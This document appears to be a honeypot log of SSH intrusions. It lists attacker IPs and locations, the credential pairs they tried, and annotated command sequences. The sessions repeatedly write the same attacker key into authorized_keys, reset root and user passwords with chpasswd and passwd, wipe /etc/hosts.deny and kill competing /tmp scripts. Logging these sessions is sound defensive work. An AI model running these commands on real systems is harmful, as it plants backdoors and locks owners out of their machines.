$ echo "root:nKIEWj9hFe7O"|chpasswd|bash
🎭 rogue_root_112 (109.173.166.187) β€” Poznan, Poland Β· 1 session Β· 1 cmd
2026-05-14 10:57 EDT Β· as root/------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 phantom_root_105 (112.119.21.245) β€” Shek Kip Mei Estate, Hong Kong Β· 2 sessions Β· 4 cmds
2026-05-14 10:12 EDT Β· as linux/linux123, root/q1q1q1
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 carnival_root_8 (209.14.87.61) β€” Rio de Janeiro, Brazil Β· 1 session Β· 2 cmds
2026-05-14 10:03 EDT Β· as root/maribel
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 specter_root_101 (118.193.47.155) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 23 cmds
2026-05-14 09:11 EDT Β· as linux/linux123, root/!qaz@wsx, root/amber1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:bHB4Ws2aL98O"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_62 (76.127.61.251) β€” Santa Fe, United States Β· 3 sessions Β· 6 cmds
2026-05-14 09:15 EDT Β· as linux/linux123, root/!qaz@wsx, root/amber1
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 wok_root_28 (192.144.228.217) β€” Beijing, China Β· 1 session Β· 2 cmds
2026-05-14 09:09 EDT Β· as root/bitch123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 stroopwafel_root_12 (51.15.48.22) β€” Haarlem, Netherlands Β· 1 session Β· 1 cmd
2026-05-14 08:55 EDT Β· as root/root
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a ; echo 'vT'
🎭 wraith_root_96 (103.165.139.145) β€” Jakarta, Indonesia Β· 3 sessions Β· 24 cmds
2026-05-06 12:13 EDT Β· as dev/dev2023, linux/linux123, pakchoi/Kermit123@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "dev2023\nyZAvqFvGp2Ex\nyZAvqFvGp2Ex"|passwd|bash
$ Enter new UNIX password:
$ echo "dev2023\nyZAvqFvGp2Ex\nyZAvqFvGp2Ex\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_15 (165.245.185.145) β€” Singapore, Singapore Β· 1 session Β· 2 cmds
2026-05-14 07:32 EDT Β· as linux/linux123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 panda_root_38 (115.190.151.242) β€” Haidian, China Β· 1 session Β· 7 cmds
2026-05-14 07:28 EDT Β· as misha/misha
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "misha\nffspp7QXCKMq\nffspp7QXCKMq"|passwd|bash
$ Enter new UNIX password:
$ echo "misha\nffspp7QXCKMq\nffspp7QXCKMq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
🎭 cipher_root_95 (165.154.227.158) β€” Taipei, Taiwan Β· 3 sessions Β· 58 cmds
2026-05-14 06:51 EDT Β· as pakchoi/Kermit123@, root/2069, root/sergei
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Kermit123@\nsjU2KNZJdVos\nsjU2KNZJdVos"|passwd|bash
$ Enter new UNIX password:
$ echo "Kermit123@\nsjU2KNZJdVos\nsjU2KNZJdVos\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:UiMRtTuHQuZi"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:pKtqZfL6B8B7"|chpasswd|bash
🎭 wraith_root_97 (103.187.165.26) β€” Jakarta, Indonesia Β· 4 sessions Β· 77 cmds
2026-05-14 07:06 EDT Β· as pakchoi/Kermit123@, root/2069, root/kiran@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:g4m7T6ziNQI1"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:OUYeDvOTLjoX"|chpasswd|bash
$ echo -e "Kermit123@\nvSYwzDJiOdjM\nvSYwzDJiOdjM"|passwd|bash
$ Enter new UNIX password:
$ echo "Kermit123@\nvSYwzDJiOdjM\nvSYwzDJiOdjM\n"|passwd
$ echo "root:cJxodR57P844"|chpasswd|bash
🎭 blitz_root_16 (95.90.13.168) β€” Altdorf bei NΓΌrnberg, Germany Β· 3 sessions Β· 60 cmds
2026-05-14 07:12 EDT Β· as dev/dev12#$, linux/linux123, pakchoi/Kermit123@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Kermit123@\nf4YoOFBxcM3b\nf4YoOFBxcM3b"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "Kermit123@\nf4YoOFBxcM3b\nf4YoOFBxcM3b\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "linux123\nulVXSVbmkooP\nulVXSVbmkooP"|passwd|bash
$ echo "linux123\nulVXSVbmkooP\nulVXSVbmkooP\n"|passwd
$ echo -e "dev12#$\nKvvmRy4Qhaqr\nKvvmRy4Qhaqr"|passwd|bash
$ echo "dev12#$\nKvvmRy4Qhaqr\nKvvmRy4Qhaqr\n"|passwd
🎭 carnival_root_9 (177.53.247.76) β€” SΓ£o JosΓ©, Brazil Β· 2 sessions Β· 39 cmds
2026-05-14 06:07 EDT Β· as pakchoi/Kermit123@, root/ford
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Kermit123@\nmjA32vE4ctrt\nmjA32vE4ctrt"|passwd|bash
$ Enter new UNIX password:
$ echo "Kermit123@\nmjA32vE4ctrt\nmjA32vE4ctrt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:pwBljYRWYb2s"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 shogun_root_9 (160.16.124.58) β€” Tokyo, Japan Β· 2 sessions Β· 39 cmds
2026-05-14 06:02 EDT Β· as pakchoi/Kermit123@, root/ford
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:mUYPOQVnQ8Er"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Kermit123@\nIp61MoH9vinq\nIp61MoH9vinq"|passwd|bash
$ Enter new UNIX password:
$ echo "Kermit123@\nIp61MoH9vinq\nIp61MoH9vinq\n"|passwd
🎭 shadow_root_90 (119.246.15.94) β€” Kwai Chung, Hong Kong Β· 1 session Β· 19 cmds
2026-05-14 04:15 EDT Β· as root/Root@111
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:jkzeh6UCrtXC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_6 (41.181.156.205) β€” Germiston, South Africa Β· 2 sessions Β· 39 cmds
2026-05-07 03:27 EDT Β· as admin/Admin@2021, root/noi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:ItNirCE3Dml3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Admin@2021\nnA8iThNiT59e\nnA8iThNiT59e"|passwd|bash
$ Enter new UNIX password:
$ echo "Admin@2021\nnA8iThNiT59e\nnA8iThNiT59e\n"|passwd
🎭 silk_root_25 (222.222.168.9) β€” Baoding, China Β· 1 session Β· 19 cmds
2026-05-14 02:20 EDT Β· as root/Passw0rd
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
